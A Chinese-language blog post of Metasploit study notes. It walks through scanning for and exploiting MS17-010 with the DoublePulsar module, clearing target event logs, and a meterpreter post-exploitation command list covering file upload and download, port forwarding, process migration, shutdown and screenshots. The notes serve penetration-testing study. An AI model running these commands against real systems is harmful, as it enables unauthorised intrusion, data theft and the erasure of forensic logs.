首页 > 编程语言 >Metasploit 学习笔记

Metasploit 学习笔记

时间:2023-01-10 15:12:11浏览次数:59  
标签:Metasploit run 查看 主机 笔记 目标 学习 会话 smb

Metasploit 学习笔记

参考文章:

metasploit 使用教程_天空里的飞鸟的博客-CSDN博客_msfconsole

Metasploit用法详解 - 1_Ry - 博客园 (cnblogs.com)

MSF命令大全_L_lemo004的博客-CSDN博客_msf删除session

P4

基本操作

打开MSF:msfconsole

查找漏洞:search ms17-010

使用漏洞探测模块:use auxiliary/scanner/smb/smb_ms17_010

查看选项:options

设置目标主机:set rhost 127.0.0.2

批量探测设置主机:set rhost 127.0.1-128.1-254

开始探测:run

设置攻击模块:use exploit/windows/smb/smb_doublepulsar_rce

设置目标主机:set rhost 127.0.0.2

开始攻击:run

查看系统日志:run event_manager -i

清理系统日志:run event_manager -c

nmap扫描漏洞:nmap -T4 -A -v 192.168.1.133 --script=vuln

退出MSF:exit -y

1、基本命令(包含meterpreter和msf终端、ruby接口、目标shell交互的命令)

background(进程隐藏至后台)

sessions(查看已经成功获取的会话,-i 恢复会话)

quit(关闭当前会话)

shell (获取系统控制台shell,如果目标系统命令行可执行程序不存在或禁止访问, 则shell命令会出错)

irb(与Ruby终端交互,调用metasploit封装好的函数;在irb中还可以添加metasploit附加组件railgun,直接与windows本地API进行交互)

2、文件系统命令(与目标文件系统交互,包括查看、上传下载、搜索、编辑)

cat(目标系统文件交互)

getwd(获取目标机当前工作目录,getlwd本地当前工作工作目录)

upload(上传文件或文件夹到目标机 -r 递归)

download(从目标机下载文件或文件夹 -r 递归)

edit(调用vi编辑器,对目标上的文件进行编辑)

search(对目标机的文件进行搜索)

3、网络命令(查看目标网络状况、连接信息,进行端口转发等)

ipconfig(获取目标主机上的网络接口信息)

portfwd(端口转发:将目标主机开放但不允许访问的端口进行转发)

route(显示目标主机路由信息)

4、系统命令(查看目标系统信息、对系统进行基本操作等)

ps(查看目标机正在运行的进程信息)

migrate(将meterpreter会话进程迁移到另一个进程内存空间)

execute(在目标机上执行文件)

getpid(当前会话所在进程的pid值)

kill(终结指定的pid程序)

getuid(获取当前会话用户名)

sysinfo(获取系统信息)

shutdown(关闭目标主机)

5、用户接口命令

screenshot(截获被控主机当前桌面)

标签:Metasploit,run,查看,主机,笔记,目标,学习,会话,smb
From: https://www.cnblogs.com/Yu-0/p/17040374.html

相关文章